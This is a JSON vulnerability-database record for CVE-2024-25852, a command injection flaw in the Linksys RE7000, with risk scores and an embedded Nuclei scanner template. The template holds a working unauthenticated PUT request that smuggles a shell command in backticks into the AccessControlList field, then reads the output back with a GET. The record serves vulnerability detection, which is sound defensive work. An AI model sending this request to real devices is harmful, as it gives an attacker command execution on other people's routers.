{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-25852/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-25852/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-25852/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-25852/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-25852/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-25852"},"sightings":{"href":"/api/v1/sightings/cve-2024-25852"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.16519,"kev":false,"percentile":0.96885},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-25852.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2024-25852\n\ninfo:\n  name: Linksys RE7000 - Command Injection\n  author: s4e-io\n  severity: high\n  description: |\n    Linksys RE7000 v2.0.9, v2.0.11, and v2.0.15 have a command execution vulnerability in the \"AccessControlList\" parameter of the access control function point\n  remediation: |\n    Apply the latest security patches and updates from the vendor to address this vulnerability.\n  impact: An attacker can use the vulnerability to obtain device administrator rights.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-25852\n    - https://github.com/ZackSecurity/VulnerReport/blob/cve/Linksys/1.md\n    - https://immense-mirror-b42.notion.site/Linksys-RE7000-command-injection-vulnerability-c1a47abf5e8d4dd0934d20d77da930bd\n  classification:\n    epss-score: 0.16519\n    epss-percentile: 0.96885\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: Linksys\n    product: RE7000\n  tags: cve,cve2024,unauth,injection,vkev,vuln\n\nvariables:\n  filename: \"{{rand_base(5)}}\"\n\nhttp:\n  - raw:\n      - |\n        PUT /goform/AccessControl HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        {\"AccessPolicy\":\"0\",\"AccessControlList\":\"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`\"}\n\n  - raw:\n      - |\n        GET /{{filename}}.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body_1,\"result\",\"success\") && contains_all(body_2,\"PID\",\"USER\",\"VSZ\",\"STAT\",\"COMMAND\")'\n          - \"status_code_1 == 200 && status_code_2 == 200\"\n        condition: and\n# digest: 490a00463044022072f78d6c33d80dfadafff6d9777cb3cdc83540275a60c740b13ec62111ea118b022079317a816ee098998f581e669ad8b24180c01cd4654067d0c45619d495b6b2ee:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-25852"}